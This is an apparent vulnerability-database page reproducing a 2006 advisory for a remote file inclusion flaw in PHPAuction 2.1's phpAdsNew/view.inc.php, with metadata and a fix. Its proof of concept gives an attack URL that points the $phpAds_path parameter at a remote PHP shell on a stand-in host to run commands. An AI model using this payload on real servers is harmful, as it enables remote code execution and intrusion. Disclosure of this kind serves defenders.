PHPAuction 2.1 Remote File Inclusion

vendor:

PHPAuction

by:

Philipp Niedziela

7,5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: PHPAuction

Affected Version From: PHPAuction 2.1

Affected Version To: PHPAuction 2.1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

PHPAuction 2.1 Remote File Inclusion

PHPAuction 2.1 is vulnerable to a Remote File Inclusion vulnerability due to the fact that the $phpAds_path variable is not properly sanitized before being used. This could allow an attacker to execute arbitrary code on the vulnerable server.

Mitigation:

Declare $phpAds_path before using.

Source

Exploit-DB raw data:

+--------------------------------------------------------------------
+
+ PHPAuction 2.1 Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: PHPAuction 2.1 (maybe higher)
+ Venedor ...........: http://www.phpauction.net,
+ Class .............: Remote File Inclusion in /phpAdsNew/view.inc.php
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /phpAdsNew/view.inc.php:
+
+ .....
+ // Include required files
+ require ("$phpAds_path/dblib.php");
+ require ("$phpAds_path/lib-expire.inc.php");
+ .....
+
+--------------------------------------------------------------------
+
+ $phpAds_path is not properly sanitized before being used.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Declare $phpAds_path before using.
+
+--------------------------------------------------------------------
+ PoC:
+ Place a PHPShell on a remote location:
+ http://evilsite.com/dblib.php/index.html
+
+ http://[target]/phpAdsNew/view.inc.php?phpAds_path=http://evilsite.com/dblib.php/&cmd=ls
+
+--------------------------------------------------------------------
+
+ Greets:
+ Krini&Lenni
+
+-------------------------[ E O F ]----------------------------------

# milw0rm.com [2006-08-01]